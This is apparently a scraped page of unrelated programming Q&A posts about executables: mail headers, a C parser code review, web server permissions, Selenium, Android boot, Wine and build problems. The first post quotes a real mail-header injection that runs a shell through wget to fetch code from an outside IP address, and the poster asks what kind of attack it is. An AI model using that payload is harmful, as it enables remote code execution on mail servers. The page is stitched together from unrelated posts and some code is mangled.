Executable Code in Mail Headers [duplicate]

This question already has an answer here:

  • Unusual mail headers show evidence of MTA attack. Have I been pwned? 1 answer

Recently I noticed someone delivering email to my server root account with headers like this:

X-Original-To: root+$ {run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f45.79.163.30×22}}@host.example.com

I’ve never seen or heard of mail header injection. Can someone please identify what type of attack this is and which environments may be vulnerable to it?

Is there anyway to create an executable backup of a folder?

I have to create an executable to restore a workspace back to a certain stage (offline so files need to be stored with the executable). I know the shell commands I’d require but I’m not sure how to package this all into a nice executable with the files?

what I am requiring is:

  • delete existing folder if exists
  • copy files to this location
  • catkin_make (it’s a ROS workspace)
  • reboot

Essentially I have to make an idiot-proof way to restore the software to a version with just a double click.

Thanks if anyone can assist me 🙂

State machine translates text into executable python code [v2]

A few days ago I started writing my own compiler-like program which has the goal to compile plain text into executable python code. After I let my first version review here, I made huge changes to the overall code and added the possibility of adding rectangles. I try to add all the suggested improvements as best as I could, please do not feel offended, if I missed one of your suggestions.

My final goal is to write a program which compiles text into executable python code, which then will display a 3D-Diagram containing all geometric shapes when executed.

At the moment, the user has to provide a text similar to this:

(1.2,45,6) (7,8,5) (10,77,88) (99999,1,1) R((1,1,1),(2,2,2),(1,3,4)) (5,7,6) (1,2,3) (4,5,6) R((2,3,4),(9,9,9),(3,4,5))   P(2,1,1)

where R(…) symbolizes rectangles and P(…) is an acronym for a profane point. I added the formatting mistake of the last line, purposely, to show that the compiler does not care about spaces. This plain text will be compiled to a python-code similar (depending on the exact preferences of the code) like this.

points =  [ (1.2,45,6), (7,8,5), (10,77,88), (99999,1,1), ] points.extend([ (5,7,6), (1,2,3), (4,5,6), (2,1,1), ]) rectangels =  [ ((1,1,1),(2,2,2),(1,3,4)), ((2,3,4),(9,9,9),(3,4,5)), ] print(points) print(rectangels) 

For the sake of me, you and all humankind I quickly realized that rewriting the code into a state machine is the proper way to go after suggested by @Edward.

So how could I further improve the following code?

#include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <float.h> #include <ctype.h>  #define SPACE_FOR_POINTS 4 #define SPACE_FOR_RECTANGLES 4 /*For some reason, maximum size of any double represetend as a string:  StackOverflow: What is the maximum length in chars needed to represent any double value?  */ #define MAX_DIGITS_DOUBLE 3 + DBL_MANT_DIG - DBL_MIN_EXP #define MAX_DIGITS_POINTS 5 + 3*MAX_DIGITS_DOUBLE #define MAX_DIGITS_RECT 17+9*MAX_DIGITS_DOUBLE  void printPointList(char appened, char** points, int index); void printRectangleList(char appened, char** rectangles, int index);  int main(int argc, const char * argv[]) {     FILE* fp = fopen(argv[1], "r");     if(fp == NULL)return errno;      //Do parsing      char** points; //all future points will be stored here     points = malloc(SPACE_FOR_POINTS * sizeof(char*)); //for the moment, make space for SPACE_FOR_POINTS     if(points != NULL){         for(int i = 0; i < SPACE_FOR_POINTS; i++){             /*              This is a point to be stored:              (double,double,double)              Calloc is better, because we can later break              creating the list of points/rectangels, when first char is not '(',              which is not necessarily the case for malloc.              */             points[i] = calloc(MAX_DIGITS_POINTS,1);              if(points[i] == NULL){                 fprintf(stderr, "Could not allocate enough memory to perform compilation.");                 return -1;             }         }     } else {         fprintf(stderr, "Could not allocate enough memory to perform compilation.");         return -1;     }      char** rectangles; //all future regtangles will be stored here     rectangles = malloc(SPACE_FOR_RECTANGLES*sizeof(char*)); /*for the moment, make space for                                                              SPACE_FOR_RECTANGLES */     if(points != NULL){         for(int i = 0; i < SPACE_FOR_RECTANGLES; i++){             /*              This is a rectangle to be stored:              ((double,double,double),(double,double,double),(double,double,double))               Calloc is better, because we can later break              creating the list of points/rectangels, when first char is not '(',              which is not necessarily the case for malloc.              */             rectangles[i] = calloc(MAX_DIGITS_RECT, 1);             if(rectangles[i] == NULL){                 fprintf(stderr, "Could not allocate enough memory to perform compilation.");                 return -1;             }         }     } else {         fprintf(stderr, "Could not allocate enough memory to perform compilation.");         return -1;     }      char bool_appended_rectangle = 0; //Was a list already printed?     char bool_appended_points = 0; //Was a list already printed?     int numbers_written = 0; //counter     int points_index = -1;     int rectangels_index = -1;     size_t actual_index = 0; //counter      enum{name, openparen, comma, number, endparen, error} state = endparen;     enum{point, rectangle} shape = point;      //State machine     for (char ch = fgetc(fp); ch != EOF; ch = fgetc(fp)) {         if(isspace(ch)){             continue;         }         switch(state){         case name:             if(ch == '('){                 state = openparen;                 switch (shape) {                     case rectangle:                         rectangles[rectangels_index][actual_index++] = ch;                         break;                     case point:                         points[points_index][actual_index++] = ch;                         break;                     default:                         break;                 }             } else {                 state = error;             }             break;         case openparen:             if(ch == '('){                 switch (shape) {                     case rectangle:                         rectangles[rectangels_index][actual_index++] = ch;                         state = openparen;                         break;                     case point:                         state = error;                         break;                     default:                         break;                 }             }             if(isdigit(ch)){                 numbers_written++;                 switch (shape) {                     case rectangle:                         rectangles[rectangels_index][actual_index++] = ch;                         state = number;                         break;                     case point:                         points[points_index][actual_index++] = ch;                         state = number;                         break;                     default:                         break;                 }             }             break;         case number:                 if(isdigit(ch)){                     switch (shape) {                         case rectangle:                             rectangles[rectangels_index][actual_index++] = ch;                             break;                         case point:                             points[points_index][actual_index++] = ch;                             break;                         default:                             break;                     }                     break;                 }                 if(ch == ','){                     switch (shape) {                         case rectangle:                             if(numbers_written <= 9){                                 rectangles[rectangels_index][actual_index++] = ch;                                 state = comma;                             } else {                                 state = error;                             }                             break;                         case point:                             if(numbers_written <= 3){                                 points[points_index][actual_index++] = ch;                                 state = comma;                             } else {                                 state = error;                             }                         default:                             break;                     }                     break;                 }                 if(ch == ')'){                         switch (shape) {                         case rectangle:                             if(numbers_written%3 == 0){                                 rectangles[rectangels_index][actual_index++] = ch;                                 state = endparen;                             } else {                                 state = error;                             }                             break;                         case point:                             //printf("%d", numbers_written);                             if(numbers_written == 3){                                 state = endparen;                                 points[points_index][actual_index++] = ch;                             } else {                                 state = error;                             }                             break;                         default:                             break;                     }                     break;                 }                 if(ch == '.'){                     points[points_index][actual_index++] = ch;                     break;                 }                 state = error;                 break;         case endparen:                 switch (state) {                     case point:                         points[points_index][actual_index++] = '';                         break;                     case rectangle:                         rectangles[rectangels_index][actual_index++] = '';                         break;                     default:                         break;                 }                 if(ch == '(' || ch == 'P'){                     if(++points_index >= SPACE_FOR_POINTS){                         printPointList(bool_appended_points, points, points_index-1);                         bool_appended_points = 1;                         //clear all Strings                         for(int i = 0; i < points_index; i++){                             points[i] = calloc(MAX_DIGITS_POINTS, 1);                         }                         points_index = 0;                     }                 }                 if(ch == '('){                     actual_index = 0;                     points[points_index][actual_index++] = ch;                     shape = point;                     state = openparen;                     numbers_written = 0;                     break;                 }                 if(ch == 'P'){                     actual_index = 0;                     state = name;                     shape = point;                     numbers_written = 0;                     break;                 }                 if(ch == 'R'){                     if(++rectangels_index >= SPACE_FOR_RECTANGLES){                         printRectangleList(bool_appended_rectangle, rectangles, rectangels_index-1);                         bool_appended_rectangle = 1;                         //clear all strings                         for(int i = 0; i < rectangels_index; i++){                             rectangles[i] = calloc(MAX_DIGITS_RECT, 1);                         }                         rectangels_index = 0;                     }                     actual_index = 0;                     state = name;                     shape = rectangle;                     numbers_written = 0;                     break;                 }                 if(ch == ','){                     if(shape == rectangle){                         if(numbers_written < 9){                             rectangles[rectangels_index][actual_index++] = ch;                             state = comma;                         } else {                             state = error;                         }                     }                     break;                 }                 if(ch == ')'){                     if(shape == rectangle){                         rectangles[rectangels_index][actual_index++] = ch;                         rectangles[rectangels_index][actual_index++] = '';                         break;                     }                 }                 state = error;                 break;         case comma:                 switch (shape) {                     case point:                         if(isdigit(ch)){                             numbers_written++;                             state = number;                             points[points_index][actual_index++] = ch;                             break;                         }                         state = error;                         break;                     case rectangle:                         if(isdigit(ch)){                             numbers_written++;                             rectangles[rectangels_index][actual_index++] = ch;                             state = number;                             break;                         }                         if(ch == '('){                             rectangles[rectangels_index][actual_index++] = ch;                             state = openparen;                             break;                         }                         state = error;                         break;                     default:                         break;                 }                 break;         default:             fprintf(stderr, "Error: Corrupted File.");             return -1;         }     }      printPointList(bool_appended_points, points, points_index);     printRectangleList(bool_appended_rectangle, rectangles, rectangels_index);     printf("print(points)\n");     printf("print(rectangels)\n");      fclose(stdout); //needed?     fclose(fp);     return 1; } void printPointList(char appended, char** points, int index){     if(!appended){         appended = 1;         printf("points =  [\n");     } else {         printf("points.extend(\n");     }     for(int i = 0; i <= index; i++){             printf("%s,\n", points[i]);     }     if(!appended){         printf("]\n");     } else {          printf("])\n");     } } void printRectangleList(char appended, char** rectangles, int index){     if(!appended){         appended = 1;         printf("rectangle =  [\n");     } else {         printf("rectangle.extend(\n");     }     for(int i = 0; i <= index; i++){         printf("%s,\n", rectangles[i]);     }     if(!appended){         printf("]\n");     } else {         printf("])\n");     } } 

Is it ok to allow a web application to write its own executable files?

Usually I setup my Ubuntu server to have at least 2 users:

  • A user behalf which the web server (Apache or Nginx) runs, e.g. www-data in group www-data
  • A user that updates and maintains the web applications, e.g. deployer in groups deployer and www-data

A web application consists of 2 directories:

  • A directory for executable files (e.g. PHP or JS) served by the web server (Apache or Nginx) and a code interpreter, e.g. app
  • A directory for the application to write (caches, logs, uploads, etc.), e.g. storage

I make make the app directory have rwxrwxr-x deployer:deployer (mode, user and group) permission and storage have rwxrwxr-x www-data:www-data permission.

The problem is that it’s inconvenient to maintain the web application because it writes the files to storage with the default permission (rw-r--r-- www-data:www-data) and therefore deployer can’t write them. And vise versa, deployer can leave files in storage with rw-r--r-- deployer:deployer permission that are not writable by the application. I have to make some complex sudo setup and watch carefully the files created by deployer creates to maintain the application and keep it running.

Does the application self-write restriction worth the inconveniences? Is it ok (considering security concerns) to run the web server and maintain the application using a single user that can write the files both in the app and storage directories?

Problem with mod_deflate – compressing executable file

When trying to download file with .EXE extension in the site, the files are coming as .GZ Environment
Centos 7 64
Apache 2.4.6

Changing the file in /etc/httpd/conf/httpd.conf I've already tried using each of these methods below, however, to no avail (I restarted apache and deleted the browser cache on each attempt):

1: SetEnvIfNoCase Request_URI .exe$ no-gzip dont-vary

2: SetEnv no-gzip 1

3: SetEnv mod_deflate off

4: SetEnv no-gzip off

5: In…

Problem with mod_deflate – compressing executable file

Exception in thread “main” java.lang.IllegalStateException: The driver executable is a directory: C:\Users\Micky\OneDrive\Desktop\chromedriver.exe

Exception in thread “main” java.lang.IllegalStateException: The driver executable is a directory: C:\Users\Micky\OneDrive\Desktop\chromedriver.exe at com.google.common.base.Preconditions.checkState(Preconditions.java:585) at org.openqa.selenium.remote.service.DriverService.checkExecutable(DriverService.java:148) at org.openqa.selenium.remote.service.DriverService.findExecutable(DriverService.java:141) at org.openqa.selenium.chrome.ChromeDriverService.access$ 000(ChromeDriverService.java:35) at org.openqa.selenium.chrome.ChromeDriverService$ Builder.findDefaultExecutable(ChromeDriverService.java:159) at org.openqa.selenium.remote.service.DriverService$ Builder.build(DriverService.java:355) at org.openqa.selenium.chrome.ChromeDriverService.createDefaultService(ChromeDriverService.java:94) at org.openqa.selenium.chrome.ChromeDriver.(ChromeDriver.java:123) at Demo.main(Demo.java:13)

Tried adding chromedriver as an environment variable, mapping it to its path. Checked that all required jars are present

import org.openqa.selenium.WebDriver; import org.openqa.selenium.chrome.ChromeDriver;

public class Demo {

public static void main(String[] args)  {     // TODO Auto-generated method stub      // cREATE DRIVER OBJECT FOR CHROME BROWSER     System.setProperty("webdriver.chrome.driver", "C:\Users\Micky\OneDrive\Desktop\chromedriver.exe");      WebDriver driver = new ChromeDriver();      driver.get("http://google.com");    } 

}

Expected – Google webpage should load. Actual – Exception in thread “main” java.lang.IllegalStateException: The driver executable is a directory: C:\Users\Micky\OneDrive\Desktop\chromedriver.exe at com.google.common.base.Preconditions.checkState(Preconditions.java:585) at org.openqa.selenium.remote.service.DriverService.checkExecutable(DriverService.java:148) at org.openqa.selenium.remote.service.DriverService.findExecutable(DriverService.java:141) at org.openqa.selenium.chrome.ChromeDriverService.access$ 000(ChromeDriverService.java:35) at org.openqa.selenium.chrome.ChromeDriverService$ Builder.findDefaultExecutable(ChromeDriverService.java:159) at org.openqa.selenium.remote.service.DriverService$ Builder.build(DriverService.java:355) at org.openqa.selenium.chrome.ChromeDriverService.createDefaultService(ChromeDriverService.java:94) at org.openqa.selenium.chrome.ChromeDriver.(ChromeDriver.java:123) at Demo.main(Demo.java:13)

How to run an executable on boot and keep it running?

I have an executable build from a ndk-build program. I want to run it on a rooted Android device. How much is the possibility that Android will kill my executable?

Using adb shell, I am able to execute my executable using following commands:

adb push executable /sdcard adb shell device:/ $   su device:/ # cd /system device:/system # mount -o rw,remount /system device:/system # mv /sdcard/executable . device:/system # ./executable 

My requirement is to run this executable on device boot.

I have tried following:

  1. Write ./executable in init.rc.
    • On reboot init.rc reset to its original contents. I figured out that Magisk done this.
  2. Write commands in /system/etc/init/bootstat.rc
    • ./executable
    • service custom /system/executable
    • on boot ./system/dhandler/diag_revealer

None of the above thing is working.

Wine software on Ubuntu could not find version 9.2 of the Matlab Runtime to run a Windows based executable

I am using Ubuntu 16.04. I want to run a windows based executable on Ubuntu so I am using wine package to do that.

How ever when I try to run the program on ubuntu I get this error: “Could not find version 9.2 of the MATLAB Runtime. Attempting to load mclmcrrt9.2.dll. Please install the correct version of the MATLAB Runtime”

So I installed Matlab Runtime 9.2 installed as per the instruction.

I have also added the environment variable using the following commands: export LD_LIBRARY_PATH=/usr/local/MATLAB/MATLAB_Runtime/v92/sys/os/glnxa64

and also added this to be safe: export LD_LIBRARY_PATH=/usr/local/MATLAB/MATLAB_Runtime/v92/

However, when I try to run the program on ubuntu I get this error: “Could not find version 9.2 of the MATLAB Runtime. Attempting to load mclmcrrt9.2.dllmclmcrrt9.2.dll. Please install the correct version of the MATLAB Runtime”.

Can someone please let me know if I am missing something here or what can I do to fix this error?

Thank you, Vinit

Why does my file become a shared library instead of an executable?

I’m trying to build a SPPARKS (Sandia software) executable file following the procedure detailed here:

The issue is that, my final “make” file should end up as an executable, but instead it’s becoming a shared library file. Is there an easy fix for this or some simple way to run a shared library file as an executable? I would appreciate any help!